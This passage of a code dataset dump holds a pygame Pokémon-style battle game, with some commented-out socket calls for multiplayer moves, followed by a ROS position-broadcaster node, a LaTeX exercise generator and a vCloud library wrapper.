20, 637, 50)\r\n\r\n # 创建 技能组 对象\r\n Zigzagoon01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Zigzagoon02.skills = (knock02, shadowBall02, powerup02, lightning02)\r\n\r\n '''\r\n 裂空座初始化 1\r\n '''\r\n # 创建 我方裂空座\r\n Rayquaza01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Rayquaza01.png\", \"../othersource/Pic/headPortraits/Rayquaza01.png\", 1, '裂空座',\r\n 400, 400, 120, 100, 150, 0, 70, 70, 80)\r\n Rayquaza01.orderPos = (174, 110)\r\n\r\n # 创建 野生裂空座\r\n Rayquaza02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Rayquaza02.png\", None, 2, '裂空座',\r\n 10, 400, 120, 100, 150, 0, 70, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Rayquaza01.skills = (dragonClaw01, sabreDance01, yeokrin01, kirin01)\r\n Rayquaza02.skills = (dragonClaw02, sabreDance02, yeokrin02, kirin02)\r\n\r\n '''\r\n 裂空座初始化结束\r\n '''\r\n\r\n '''\r\n 火鸡战士初始化 2\r\n '''\r\n # 创建 我方火鸡战士\r\n Blaziken01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Blaziken01.png\", \"../othersource/Pic/headPortraits/Blaziken01.png\", 1, '火鸡战士',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n Blaziken01.orderPos = (298, 110)\r\n\r\n # 创建 野生火鸡战士\r\n Blaziken02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Blaziken02.png\", None, 2, '火鸡战士',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Blaziken01.skills = (protection01, fireKick01, powerup01, fireBeam01)\r\n Blaziken02.skills = (protection02, fireKick02, powerup02, fireBeam02)\r\n\r\n '''\r\n 火鸡战士初始化结束\r\n '''\r\n\r\n '''\r\n 炎帝初始化 \r\n '''\r\n # 创建 野生炎帝\r\n Entei02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Entei02.png\", None, 2, '炎帝',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # # 创建 我方炎帝 无图\r\n # Entei01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Entei01.png\", 1, '炎帝',\r\n # 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n # Entei01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Entei02.skills = (protection02, fireKick02, powerup02, fireBeam02)\r\n\r\n '''\r\n 炎帝初始化结束\r\n '''\r\n\r\n '''\r\n 灾兽初始化 \r\n '''\r\n # 创建 野生灾兽\r\n Absol02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Absol02.png\", None, 2, '灾兽',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # # 创建 我方灾兽 无图\r\n # Absol01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Absol01.png\", 1, '灾兽',\r\n # 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n # Absol01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Absol02.skills = (sabreDance02, shadowBall02, iceBeam02, kirin02)\r\n\r\n '''\r\n 灾兽初始化结束\r\n '''\r\n\r\n '''\r\n 闪电鸟初始化 3\r\n '''\r\n # 创建 我方闪电鸟\r\n Zapdos01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Zapdos01.png\", \"../othersource/Pic/headPortraits/Zapdos01.png\", 1, '闪电鸟',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n Zapdos01.orderPos = (422, 110)\r\n\r\n # 创建 野生闪电鸟\r\n Zapdos02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Zapdos02.png\", None, 2, '闪电鸟',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Zapdos01.skills = (kirin01, fireBeam01, powerup01, lightning01)\r\n Zapdos02.skills = (kirin02, fireBeam02, powerup02, lightning02)\r\n\r\n '''\r\n 闪电鸟初始化结束\r\n '''\r\n\r\n '''\r\n 巨钳螳螂初始化 4\r\n '''\r\n # 创建 我方巨钳螳螂\r\n Scizor01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Scizor01.png\", \"../othersource/Pic/headPortraits/Scizor01.png\", 1, '巨钳螳螂',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n 
Scizor01.orderPos = (50, 191)\r\n\r\n # 创建 野生巨钳螳螂\r\n Scizor02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Scizor02.png\", None, 2, '巨钳螳螂',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Scizor01.skills = (sabreDance01, bulletFist01, iceBeam01, fireKick01)\r\n Scizor02.skills = (sabreDance02, bulletFist02, iceBeam02, fireKick02)\r\n\r\n '''\r\n 巨钳螳螂初始化结束\r\n '''\r\n\r\n '''\r\n 九尾初始化 \r\n '''\r\n # 创建 野生九尾\r\n Ninetails02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Ninetails02.png\", None, 2, '九尾',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # # 创建 我方九尾 无图\r\n # Ninetails01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Ninetails01.png\", 1, '九尾',\r\n # 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n # Ninetails01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Ninetails02.skills = (protection02, fireBeam02, powerup02, fireKick02)\r\n\r\n '''\r\n 九尾初始化结束\r\n '''\r\n\r\n '''\r\n 超梦初始化 \r\n '''\r\n # 创建 野生超梦\r\n Mewtwo02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Mewtwo02.png\", None, 2, '超梦',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # # 创建 我方超梦 无图\r\n # Mewtwo01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Mewtwo01.png\", 1, '超梦',\r\n # 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n # Mewtwo01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Mewtwo02.skills = (kirin02, shadowBall02, iceBeam02, tsunami02)\r\n\r\n '''\r\n 超梦初始化结束\r\n '''\r\n\r\n '''\r\n 鲤鱼王初始化 \r\n '''\r\n # 创建 野生鲤鱼王\r\n Magikarp02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Magikarp02.png\", None, 2, '鲤鱼王',\r\n 999999999, 999999999, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # # 创建 我方鲤鱼王 无图\r\n # Magikarp01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Magikarp01.png\", 1, '鲤鱼王',\r\n # 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n # Magikarp01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Magikarp02.skills = (splash02, splash02, splash02, splash02)\r\n\r\n '''\r\n 鲤鱼王初始化结束\r\n '''\r\n\r\n ''' \r\n 暴鲤龙初始化 5\r\n '''\r\n # 创建 我方暴鲤龙\r\n Gyarados01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Gyarados01.png\", \"../othersource/Pic/headPortraits/Gyarados01.png\", 1, '暴鲤龙',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n Gyarados01.orderPos = (174, 191)\r\n\r\n # 创建 野生暴鲤龙\r\n Gyarados02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Gyarados02.png\", None, 2, '暴鲤龙',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Gyarados01.skills = (dragonClaw01, tsunami01, sabreDance01, waterfall01)\r\n Gyarados02.skills = (dragonClaw02, tsunami02, sabreDance02, waterfall02)\r\n\r\n '''\r\n 暴鲤龙初始化结束\r\n '''\r\n\r\n '''\r\n 古拉顿初始化 6\r\n '''\r\n # 创建 我方古拉顿\r\n Groudon01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Groudon01.png\", \"../othersource/Pic/headPortraits/Groudon01.png\", 1, '古拉顿',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n Groudon01.orderPos = (298, 191)\r\n\r\n # 创建 野生古拉顿\r\n Groudon02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Groudon02.png\", None, 2, '古拉顿',\r\n 40, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Groudon01.skills = (fireKick01, fireBeam01, powerup01, protection01)\r\n Groudon02.skills = (fireKick02, fireBeam02, powerup02, protection02)\r\n\r\n '''\r\n 古拉顿初始化结束\r\n '''\r\n\r\n '''\r\n 沙奈朵初始化 7\r\n '''\r\n # # 创建 野生沙奈朵 无图\r\n 
# Gardevoir02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Gardevoir02.png\", 2, '沙奈朵',\r\n # 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 我方沙奈朵\r\n Gardevoir01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Gardevoir01.png\", \"../othersource/Pic/headPortraits/Gardevoir01.png\", 1, '沙奈朵',\r\n 400, 400, 120, 100, 150, 0, 100, 70, 80)\r\n Gardevoir01.orderPos = (422, 191)\r\n\r\n # 创建 技能组 对象\r\n Gardevoir01.skills = (hypnotism01, kirin01, powerup01, lightning01)\r\n # Gardevoir02.skills = (knock02, shadowBall02, powerup02, lightning02)\r\n\r\n '''\r\n 沙奈朵初始化结束\r\n '''\r\n\r\n '''\r\n 沙漠蜻蜓初始化 \r\n '''\r\n # 创建 野生沙漠蜻蜓\r\n Flygon02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Flygon02.png\", None, 2, '沙漠蜻蜓',\r\n 40, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # # 创建 我方沙漠蜻蜓 无图\r\n # Flygon01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Flygon01.png\", 1, '沙漠蜻蜓',\r\n # 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n # Flygon01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Flygon02.skills = (fireBeam02, iceBeam02, powerup02, dragonClaw02)\r\n\r\n '''\r\n 沙漠蜻蜓初始化结束\r\n '''\r\n\r\n '''\r\n 喷火龙初始化 8\r\n '''\r\n # 创建 我方喷火龙\r\n Charizard01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Charizard01.png\", \"../othersource/Pic/headPortraits/Charizard01.png\", 1, '喷火龙',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n Charizard01.orderPos = (50, 272)\r\n\r\n # 创建 野生喷火龙\r\n Charizard02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Charizard02.png\", None, 2, '喷火龙',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Charizard01.skills = (knock01, fireBeam01, powerup01, dragonClaw01)\r\n Charizard02.skills = (knock02, fireBeam02, powerup02, dragonClaw02)\r\n\r\n '''\r\n 喷火龙初始化结束\r\n '''\r\n\r\n '''\r\n 急冻鸟初始化 9\r\n '''\r\n # 创建 我方急冻鸟\r\n Articuno01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Articuno01.png\", \"../othersource/Pic/headPortraits/Articuno01.png\", 1, '急冻鸟',\r\n 400, 400, 120, 100, 150, 0, 100, 70, 80)\r\n Articuno01.orderPos = (174, 272)\r\n\r\n # 创建 野生急冻鸟\r\n Articuno02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Articuno02.png\", None, 2, '急冻鸟',\r\n 40, 400, 120, 100, 150, 0, 100, 637, 0)\r\n\r\n # 创建 技能组 对象\r\n Articuno01.skills = (dragonClaw01, kirin01, iceBeam01, lightning01)\r\n Articuno02.skills = (dragonClaw02, kirin02, iceBeam02, lightning02)\r\n\r\n '''\r\n 海皇牙初始化 10\r\n '''\r\n # 创建 我方海皇牙\r\n Kyogre01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Kyogre01.png\", \"../othersource/Pic/headPortraits/Kyogre01.png\", 1, '海皇牙',\r\n 400, 400, 120, 100, 150, 0, 100, 70, 80)\r\n Kyogre01.orderPos = (298, 272)\r\n\r\n # 创建 野生海皇牙\r\n Kyogre02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Kyogre02.png\", None, 2, '海皇牙',\r\n 40, 400, 120, 100, 150, 0, 100, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Kyogre01.skills = (iceBeam01, tsunami01, waterfall01, kirin01)\r\n Kyogre02.skills = (iceBeam02, tsunami02, waterfall02, kirin02)\r\n\r\n '''\r\n 皮卡丘初始化 11\r\n '''\r\n # 创建 我方皮卡丘\r\n Pikachu01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Pikachu01.png\", \"../othersource/Pic/headPortraits/Pikachu01.png\", 1, '皮卡丘',\r\n 400, 400, 120, 100, 150, 0, 100, 70, 80)\r\n Pikachu01.orderPos = (422, 272)\r\n\r\n # 创建 野生皮卡丘\r\n Pikachu02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Pikachu.png\", None, 2, '皮卡丘',\r\n 400, 
400, 120, 100, 150, 0, 100, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Pikachu01.skills = (knock01, kirin01, fireBeam01, lightning01)\r\n Pikachu02.skills = (knock02, kirin02, fireBeam02, lightning02)\r\n\r\n '''\r\n 风速狗初始化 \r\n '''\r\n # 创建 野生风速狗 无图片\r\n # Arcanine02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Arcanine02.png\", 2, '风速狗',\r\n # 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 我方风速狗\r\n Arcanine01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Arcanine01.png\", None, 1, '风速狗',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n Arcanine01.skills = (tsunami01, fireBeam01, kirin01, lightning01)\r\n # Arcanine02.skills = (knock02, shadowBall02, powerup02, lightning02)\r\n\r\n '''\r\n 风速狗初始化结束\r\n '''\r\n\r\n # 我方可选的 pokemons\r\n opt_pokemon01s = (Zigzagoon01, Rayquaza01, Blaziken01, Zapdos01, Scizor01, Gyarados01,\r\n Groudon01, Gardevoir01, Charizard01, Articuno01, Kyogre01, Pikachu01)\r\n # 存放玩家选择的 pokemons\r\n myPokemon01s = []\r\n enemyPokemon02s = [Magikarp02]\r\n # 创建 选择界面的 指针\r\n selectionPointer = SelectionPointer(p_setting, screen)\r\n # 玩家选择 pokemon 设定 对战的两个宝可梦\r\n gf.selectPokemon(p_setting, screen, opt_pokemon01s,\r\n selectionPointer, myPokemon01s)\r\n pokemon01 = myPokemon01s[0] # 我方pokemon\r\n pokemon02 = enemyPokemon02s[0] # 敌方pokemon\r\n gf.setFight(pokemon01, pokemon02)\r\n\r\n # 创建 双方状态栏 对象\r\n statebar02 = Statebar(p_setting, screen, pokemon02)\r\n statebar01 = Statebar01(p_setting, screen, pokemon01)\r\n healthbar02 = Healthbar(\r\n p_setting, screen, pokemon02, p_setting.healthbarPos)\r\n healthbar01 = Healthbar(p_setting, screen, pokemon01,\r\n p_setting.healthbar01Pos)\r\n\r\n # 创建 指针 对象\r\n pointer = Pointer(p_setting, screen, menubar, pokemon02,\r\n pokemon01, statebar02, statebar01, healthbar02, healthbar01)\r\n\r\n # 创建 技能栏 对象\r\n skillbar = Skillbar(p_setting, screen, pointer)\r\n skillbar.skills = pokemon01.skills\r\n\r\n # 记录现在该显示在屏幕下方的 菜单栏or技能栏\r\n pointer.nowbar = menubar\r\n\r\n # 游戏开始 菜单栏右移进入 野生pokemon左移进入\r\n while menubar.rect.x < 0:\r\n menubar.rect.x += 2\r\n if pokemon02.rect.x >= 300:\r\n pokemon02.rect.x -= 2\r\n gf.update_screen(p_setting, screen, menubar,\r\n None, pokemon02, pointer.nowbar)\r\n\r\n # 文本提示 ”野生的蛇纹熊出现了!“\r\n gf.update_screen(p_setting, screen, menubar,\r\n pokemon02.name + \" 出现了!\", pokemon02, pointer.nowbar)\r\n pygame.time.delay(1000)\r\n\r\n # 文本提示 ”去吧 蛇纹熊!“\r\n screen.blit(menubar.image, menubar.rect) # 覆盖上一个文本\r\n gf.update_screen(p_setting, screen, menubar, \"去吧 \" +\r\n pokemon01.name + \" !\", pokemon02, pointer.nowbar)\r\n pygame.time.delay(1000)\r\n\r\n sleepCount = 2\r\n\r\n # 游戏主循环\r\n while True:\r\n if state == 0:\r\n # 我方 选择 “战斗” menubar切换至 skillbar\r\n pointer.nowbar = menubar\r\n pointer.update()\r\n gf.update_screen(p_setting, screen, menubar, pokemon01.name +\r\n \" 想要干什么?\", statebar02, statebar01,\r\n healthbar02, healthbar01, pokemon02, pokemon01,\r\n pointer.nowbar, pointer)\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_RETURN:\r\n pointer.nowbar = skillbar\r\n state = 1\r\n pointer.update()\r\n gf.update_screen(p_setting, screen, menubar, None,\r\n statebar02, statebar01, healthbar02,\r\n healthbar01, pokemon02, pokemon01,\r\n pointer.nowbar, pointer)\r\n\r\n if state == 1:\r\n # 我方 出招\r\n '''\r\n s = socket.socket()\r\n s.connect(('42.192.86.230', 8712))\r\n '''\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_UP:\r\n 
pointer.moveUp()\r\n if event.key == pygame.K_DOWN:\r\n pointer.moveDown()\r\n if event.key == pygame.K_LEFT:\r\n pointer.moveLeft()\r\n if event.key == pygame.K_RIGHT:\r\n pointer.moveRight()\r\n if event.key == pygame.K_RETURN:\r\n pointer.nowbar = menubar\r\n\r\n state = 2\r\n skillNum = pointer.flag\r\n '''\r\n s.send(str(skillNum).encode())\r\n s.close()\r\n '''\r\n pokemon01.useSkill(skillNum) # 我方出招\r\n healthbar02.update() # 更新 敌方血条\r\n gf.update_screen(p_setting, screen, menubar,\r\n pokemon01.name + \" 使用了\" +\r\n pokemon01.skills[skillNum].name\r\n + \"!\", statebar02,\r\n statebar01, healthbar02, healthbar01,\r\n pokemon02, pokemon01, pointer.nowbar)\r\n pygame.time.delay(1000)\r\n if pokemon01.state == 1:\r\n gf.update_screen(p_setting, screen, menubar,\r\n \"但是它失败了!\", statebar02,\r\n statebar01, healthbar02, healthbar01,\r\n pokemon02, pokemon01, pointer.nowbar)\r\n pokemon01.state = 0\r\n pygame.time.delay(1000)\r\n pointer.flag = 0\r\n\r\n if gf.checkDeath(pokemon02, p_setting, screen, pointer.nowbar, menubar,\r\n statebar02, statebar01, healthbar02, healthbar01) == -1:\r\n '''\r\n s = socket.socket()\r\n s.connect(('42.192.86.230', 8712))\r\n s.send('-1'.encode())\r\n s.close()\r\n '''\r\n enemyPokemon02s.remove(enemyPokemon02s[0])\r\n if len(enemyPokemon02s) == 0:\r\n exit(0)\r\n else:\r\n pokemon02 = enemyPokemon02s[0]\r\n gf.setFight(pokemon01, pokemon02)\r\n pokemon02.rect.x = 300\r\n # 创建 双方状态栏 对象\r\n statebar02 = Statebar(p_setting, screen, pokemon02)\r\n statebar01 = Statebar01(p_setting, screen, pokemon01)\r\n healthbar02 = Healthbar(\r\n p_setting, screen, pokemon02, p_setting.healthbarPos)\r\n healthbar01 = Healthbar(p_setting, screen, pokemon01,\r\n p_setting.healthbar01Pos)\r\n healthbar02.update()\r\n healthbar01.update()\r\n # 创建 指针 对象\r\n pointer = Pointer(p_setting, screen, menubar, pokemon02,\r\n pokemon01, statebar02, statebar01, healthbar02, healthbar01)\r\n\r\n # 创建 技能栏 对象\r\n skillbar = Skillbar(p_setting, screen, pointer)\r\n skillbar.skills = pokemon01.skills\r\n\r\n # 记录现在该显示在屏幕下方的 菜单栏or技能栏\r\n pointer.nowbar = menubar\r\n screen.blit(menubar.image, menubar.rect) # 覆盖上一个文本\r\n gf.update_screen(p_setting, screen, menubar,\r\n pokemon02.name + \" 出现了!\", pokemon02, pokemon01, pointer.nowbar)\r\n state = 0\r\n pygame.time.delay(1000)\r\n\r\n if state == 2:\r\n # 敌方 出招\r\n state = 0\r\n if pokemon02.state < 0:\r\n pokemon02.state += 1\r\n gf.update_screen(p_setting, screen, menubar,\r\n pokemon02.name + \" 睡着了\" +\r\n \"!\", statebar02, statebar01,\r\n healthbar02, healthbar01, pokemon02,\r\n pokemon01, pointer.nowbar)\r\n pygame.time.delay(1000)\r\n continue\r\n skillNum = random.randint(0, 3)\r\n '''\r\n while True:\r\n choice = 0\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_RETURN:\r\n s = socket.socket()\r\n s.connect(('42.192.86.230', 8712))\r\n skillNum = int(s.recv(1024).decode())\r\n s.close()\r\n choice = 1\r\n break\r\n if choice == 1:\r\n break\r\n '''\r\n # if skillNum != -1:\r\n pokemon02.useSkill(skillNum) # 敌方 出招\r\n healthbar01.update() # 更新 我方血条\r\n gf.update_screen(p_setting, screen, menubar,\r\n pokemon02.name + \" 使用了\" +\r\n pokemon02.skills[skillNum].name +\r\n \"!\", statebar02, statebar01,\r\n healthbar02, healthbar01, pokemon02,\r\n pokemon01, pointer.nowbar)\r\n pygame.time.delay(1000)\r\n\r\n if gf.checkDeath(pokemon01, p_setting, screen, pointer.nowbar, menubar,\r\n statebar02, statebar01, healthbar02, healthbar01) == -1:\r\n '''\r\n s = socket.socket()\r\n 
s.connect(('42.192.86.230', 8712))\r\n s.send('-1'.encode())\r\n s.close()\r\n '''\r\n myPokemon01s.remove(myPokemon01s[0])\r\n if len(myPokemon01s) == 0:\r\n exit(0)\r\n else:\r\n pokemon01 = myPokemon01s[0]\r\n gf.setFight(pokemon01, pokemon02)\r\n for skill in pokemon01.skills:\r\n skill.nowPP = skill.maxPP\r\n # 创建 双方状态栏 对象\r\n statebar02 = Statebar(p_setting, screen, pokemon02)\r\n statebar01 = Statebar01(p_setting, screen, pokemon01)\r\n healthbar02 = Healthbar(\r\n p_setting, screen, pokemon02, p_setting.healthbarPos)\r\n healthbar01 = Healthbar(p_setting, screen, pokemon01,\r\n p_setting.healthbar01Pos)\r\n\r\n # 创建 指针 对象\r\n pointer = Pointer(p_setting, screen, menubar, pokemon02,\r\n pokemon01, statebar02, statebar01, healthbar02, healthbar01)\r\n\r\n # 创建 技能栏 对象\r\n skillbar = Skillbar(p_setting, screen, pointer)\r\n skillbar.skills = pokemon01.skills\r\n\r\n # 记录现在该显示在屏幕下方的 菜单栏or技能栏\r\n pointer.nowbar = menubar\r\n healthbar01.update()\r\n healthbar02.update()\r\n screen.blit(menubar.image, menubar.rect) # 覆盖上一个文本\r\n gf.update_screen(p_setting, screen, menubar, \"去吧 \" +\r\n pokemon01.name + \" !\", pokemon02, pointer.nowbar)\r\n pygame.time.delay(1000)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"trainingMode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":30085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"590126250","text":"#!/usr/bin/env python\nimport rospy\n\nimport tf\nimport tf2_ros\nimport geometry_msgs.msg\nimport math\nfrom sensor_msgs.msg import Imu\nfrom geometry_msgs.msg import Quaternion\n\nclass PositionBroadcaster:\n\n\tdef __init__(self):\n\t\t#setup broadcaster\n\t\trospy.init_node('position_broadcaster')\n\t\tself.broadcaster = tf2_ros.TransformBroadcaster()\n\t\t\n\t\t#initial position broadcast\n\t\tself.transform = geometry_msgs.msg.TransformStamped()\n\t\t\n\t\tself.transform.header.stamp = rospy.Time.now()\n\t\tself.transform.header.frame_id = \"world\"\n\t\tself.transform.child_frame_id = \"base_link\"\n\n\t\tself.transform.transform.translation.x = 0\n\t\tself.transform.transform.translation.y = 0\n\t\tself.transform.transform.translation.z = 0\n\n\t\tquat = tf.transformations.quaternion_from_euler(0, 0, 0)\n\t\tself.transform.transform.rotation.x = quat[0]\n\t\tself.transform.transform.rotation.y = quat[1]\n\t\tself.transform.transform.rotation.z = quat[2]\n\t\tself.transform.transform.rotation.w = quat[3]\n\n\t\tself.broadcaster.sendTransform(self.transform)\n\n\t\t#wheel position updates:\n\t\tself.wheel1 = geometry_msgs.msg.TransformStamped()\n\t\t\n\t\tself.wheel1.header.stamp = rospy.Time.now()\n\t\tself.wheel1.header.frame_id = \"base_link\"\n\t\tself.wheel1.child_frame_id = \"left_wheel\"\n\n\t\tself.wheel1.transform.translation.x = 0\n\t\tself.wheel1.transform.translation.y = 0\n\t\tself.wheel1.transform.translation.z = 0\n\n\t\tself.wheel1.transform.rotation.x = quat[0]\n\t\tself.wheel1.transform.rotation.y = quat[1]\n\t\tself.wheel1.transform.rotation.z = quat[2]\n\t\tself.wheel1.transform.rotation.w = quat[3]\n\n\t\tself.broadcaster.sendTransform(self.wheel1)\n\n\t\tself.wheel2 = geometry_msgs.msg.TransformStamped()\n\t\t\n\t\tself.wheel2.header.stamp = rospy.Time.now()\n\t\tself.wheel2.header.frame_id = \"base_link\"\n\t\tself.wheel2.child_frame_id = \"right_wheel\"\n\n\t\tself.wheel2.transform.translation.x = 0\n\t\tself.wheel2.transform.translation.y = 0\n\t\tself.wheel2.transform.translation.z = 
0\n\n\t\tself.wheel2.transform.rotation.x = quat[0]\n\t\tself.wheel2.transform.rotation.y = quat[1]\n\t\tself.wheel2.transform.rotation.z = quat[2]\n\t\tself.wheel2.transform.rotation.w = quat[3]\n\n\t\tself.broadcaster.sendTransform(self.wheel2)\n\t\t\n\t\t#setup callback on IMU messages\n\t\trospy.Subscriber(\"imu\", Imu, self.update_position)\n\t\t\n\t\tr = rospy.Rate(10)\n\t\twhile not rospy.is_shutdown():\n\t\t\tself.periodic()\n\t\t\tr.sleep()\n\t\t\n\tdef update_position(self, msg):\n\t\tself.transform.transform.rotation = Quaternion(*tf.transformations.unit_vector([0, 0, msg.orientation.z, msg.orientation.w]))\n\n\tdef periodic(self):\n\t\tstamp = rospy.Time.now()\n\t\tself.transform.header.stamp = stamp\n\t\tself.wheel1.header.stamp = stamp\n\t\tself.wheel2.header.stamp = stamp\n\t\tself.broadcaster.sendTransform(self.transform)\n\t\tself.broadcaster.sendTransform(self.wheel1)\n\t\tself.broadcaster.sendTransform(self.wheel2)\n\n\nif __name__ == '__main__':\n\tpb = PositionBroadcaster()\n\trospy.spin()\n","sub_path":"scripts/positioning/position_broadcaster.py","file_name":"position_broadcaster.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"473989320","text":"from elemCalc import *\nimport random\n\nopg = open(\"opgaver.tex\",\"w\")\nlos = open(\"løsninger.tex\",\"w\")\n\n\npreamble = open(\"preamble.tex\",\"r\")\nfor line in preamble:\n    opg.write(line)\n    los.write(line)\npreamble.close()\n\nopg_list = []\n\nfor i in range(100):\n    opg_list.append(multiply())\n\nfor o in opg_list:\n    opg.write(\"\\\\begin{opg}\\n\")\n    los.write(\"\\\\begin{opg}\\n\")\n    opg.write(o.exercise() + \"\\n\")\n    los.write(o.exercise() + \"\\n\")\n    opg.write(\"\\\\end{opg}\\n\")\n    los.write(\"\\\\end{opg}\\n\")\n    los.write(\"\\\\begin{los}\\n\")\n    los.write(o.solution() + \"\\n\")\n    los.write(\"\\\\end{los}\\n\")\n\n\nopg.write(\"\\\\end{document}\")\nlos.write(\"\\\\end{document}\")\n\nopg.close()\nlos.close()\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"572270817","text":"from vcloudutil.WFBSSvCloud import WFBSSvCloud\n\nimport logging\nimport sys\n_logger = logging.getLogger(__name__)\n\nclass WFBSSvCloudLibrary():\n    \n    ROBOT_LIBRARY_SCOPE = \"GLOBAL\"\n    \n    def __init__(self):\n        self.vcloudutil = WFBSSvCloud()\n    \n    def do_vcloud_operation(self, **kwargs):\n        self.vcloudutil.do_vcloud_operation(**kwargs)\n    \nif __name__ == \"__main__\":\n    \"\"\"\n    \"\"\"\n    logging.basicConfig(level=logging.DEBUG)\n    try:\n        vcloud = WFBSSvCloudLibrary()\n        kargs=dict(map(lambda x: x.lstrip('-').split('='),sys.argv[1:])) if len(sys.argv) > 1 else dict()\n        vcloud.do_vcloud_operation(**kargs)\n    except:\n        _logger.error(\"operation failed\")\n    \n    ","sub_path":"res/lib/WFBSSvCloudLibrary/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
